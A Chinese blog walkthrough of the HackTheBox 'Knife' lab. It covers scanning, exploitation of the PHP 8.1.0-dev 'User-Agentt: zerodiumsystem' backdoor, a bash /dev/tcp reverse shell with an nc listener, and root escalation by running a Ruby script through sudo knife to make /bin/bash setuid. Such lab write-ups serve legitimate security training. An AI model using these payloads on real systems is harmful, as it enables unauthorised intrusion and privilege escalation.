<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    HackTheBox-Knife靶場實戰

    VSole2021-09-24 09:07:11

    首先連接openvpn實現訪問到靶機

    ping一下靶機地址測試網絡連通

    nmap來掃描服務器開了什么端口

    從這里可以看出靶機開了22和80端口,隨手試了幾個ssh的弱口令沒啥用,只能從80端口入手了,先訪問網站

    首頁沒發現可以利用的地方,再用dirsearch掃一波目錄

    掃描出來的目錄訪問之后沒啥作用,我們來識別一波CMS用kali的whatweb來識別一波

    這里看到了X-Powered-By[PHP/8.1.0-dev]不同尋常百度之后果然有問題,X-Powered-By是響應頭里面的內容會泄露php的版本信息,而PHP/8.1.0-dev這個版本的php會有一個后門

    漏洞描述

    PHP 8.1.0-dev 版本在2021年3月28日被植入后門,但是后門很快被發現并清除。當服務器存在該后門時,攻擊者可以通過發送User-Agentt頭來執行任意代碼。

    這邊我們直接抓包并發送到重發器試試命令執行的結果

    User-Agentt: zerodiumsystem("ifconfig");
    


    現在就好辦了直接反彈shell,本機vpn的ip

    bash -c 'exec bash -i &>/dev/tcp/10.10.14.3/4444 <&1'
    

    而我們在本機用執行nc監聽端口

    nc -nvlp 4444
    

    得到反彈的shell,權限并不高,而且nc的shell不好用,所以用python來得到一個更好用的shell,好多語言都可以調用shell,你現在linux系統基本自帶python所以python更加方便

    python -c 'import pty; pty.spawn("/bin/bash")'
    

    which python可以查看有沒有python語言環境,這里有python3環境

    我們執行語句獲取shell

    此用戶權限較低,我們來提權

    sudo -l     可以知道我們了不用root密碼來執行某些文件
    

    這邊可以無密執行/usr/bin/knife文件,查看文件發現是ruby腳本的文件

    搜索了一下這個文件是一個ruby的包運行之后提示需要傳遞一個子命令

    這邊是個setuid的提權,我找的了一個大佬的解釋:

    setuid

    setuid是類unix系統提供的一個標志位, 其實際意義是set一個process的euid為這個可執行文件或程序的擁有者(比如root)的uid, 也就是說當setuid位被設置之后, 當文件或程序(統稱為executable)被執行時, 操作系統會賦予文件所有者的權限, 因為其euid是文件所有者的uid

    舉個例子

    setuid的方法是使用Linux的chmod指令,我們都習慣給予一個文件類似“0750” “0644” 之類的權限,它們的最高位0就是setuid的位置, 我們可以通過將其設為4來設置setuid位。(tips:設置為2為setgid,同setuid類似,即賦予文件所在組的權限)。

    chmod 4750 文件名orchmod u+s 文件名
    

    在這個命令執行之后, 我們再通過ls -l命令查看文件時, 可以發現文件owner權限的x 位變成了s ,這就說明setuid權限已經被設置, 之后任何user執行這個文件時(user需要有文件的執行權限), 都會以root的權限運行(此文件的owner為root)。所以,針對一個需要被很多user以root權限執行的文件, 我們可以通過setuid來進行操作, 這樣就不必為所有user都添加sudo 命令。

    tips

    在使用setuid時, 需要保證此文件有被執行的權限(x), 如果沒有執行權限。在使用ls -l查看權限時, 會發現setuid位被設置為了大寫的S, 這說明setuid位沒有被設置成功。

    原文鏈接:

    https://blog.csdn.net/weixin_44575881/article/details/86552016

    這邊繼續來提權,ruby執行命令方法exec,system,和%x。我們寫一個賦予/bin/bash setuid的腳本

    echo “system(‘chmod +s /bin/bash’)” > j.rb
    

    我們james用戶具有執行knife的權限并且是以root權限運行,所以寫一個腳本來給/bin/bash/賦予setuid位

    sudo /usr/bin/knife exec j.rb   通過knife執行我們寫的腳本
    


    sudo是linux系統管理指令,是允許系統管理員讓普通用戶執行一些或者全部的root命令的一個工具

    /bin/bash -p
    

    –posix 這個指令是需要用到root權限的,由于設置了setuid所以實現了提權

    這樣就可以拿到兩個flag了

    最后提交拿到勝利!!

    rootlinux文件權限
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    linux文件權限
    2021-09-18 06:40:06
    Linux文件權限是和 用戶與用戶組 密切相關的一個概念,對于一個文件來說,用戶可以分為三類。
    大多數計算機系統設計為可與多個用戶一起使用。特權是指允許用戶執行的操作。普通特權包括查看和編輯文件或修改系統文件。特權升級意味著用戶獲得他們無權獲得的特權。這些特權可用于刪除文件,查看私人信息或安裝不需要的程序,例如病毒。
    一文吃透 Linux 提權
    2021-10-23 07:09:32
    特權升級意味著用戶獲得他們無權獲得的特權。通常,當系統存在允許繞過安全性的錯誤或對使用方法的設計假設存在缺陷時,通常會發生這種情況。結果是,具有比應用程序開發人員或系統管理員想要的特權更多的應用程序可以執行未經授權的操作。
    Linux是目前應用最廣泛的服務器操作系統,基于Unix,開源免費,由于系統的穩定性和安全性,市場占有率很高,幾乎成為程序代碼運行的最佳系統環境。linux不僅可以長時間的運行我們編寫的程序代碼,還可以安裝在各種計算機硬件設備中,如手機、路由器等,Android程序最底層就是運行在linux系統上的。
    本文章盤點了 Linux 運維必備 150 個命令,請配合下面的網站使用。定位你需要使用的命令,然后去這個網站查詢詳細用法即可。 地址:wangchujiang.com/linux-command/
    以下結果以CentOS 7 為例,按照等保2.0標準,2021報告模板,三級系統要求進行測評。 一、身份鑒別 a)應對登錄的用戶進行身份標識和鑒別,身份標識具有唯一性,身份鑒別信息具有復雜度要求并定期更換。 輸入 more /etc/shadow,得知系統所有用戶,此語句字段格式有九段。 第一字段:用戶名(也被稱為登錄名),在/etc/shadow中,用戶名和/etc/passwd 是相同的,
    等保2.0 Linux主機測評
    2021-09-30 06:20:40
    以下結果以CentOS 7 為例,按照等保2.0標準,2021報告模板,三級系統要求進行測評。應對登錄的用戶進行身份標識和鑒別,身份標識具有唯一性,身份鑒別信息具有復雜度要求并定期更換。
    本次案例以CentOS 7 為例,按照等保2.0標準,2021報告模板,三級系統要求進行測評。
    注意在整個過程中,客戶不要事先征集到現場或現場的人員操作情況。啟動或部署監測設備,針對病毒感染進行全面監測,避免死灰復燃。在此過程中并沒有展開分析,隨后制作收集所有相關的樣本日志等,并尋找感染源頭,并制定整改。先找出急用的木馬文件,不要于打包一份。
    應急響應的基本流程
    2022-01-01 08:34:07
    注意在整個過程中不要被客戶或現場的運維人員誤導。操作前需先征得客戶許可。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类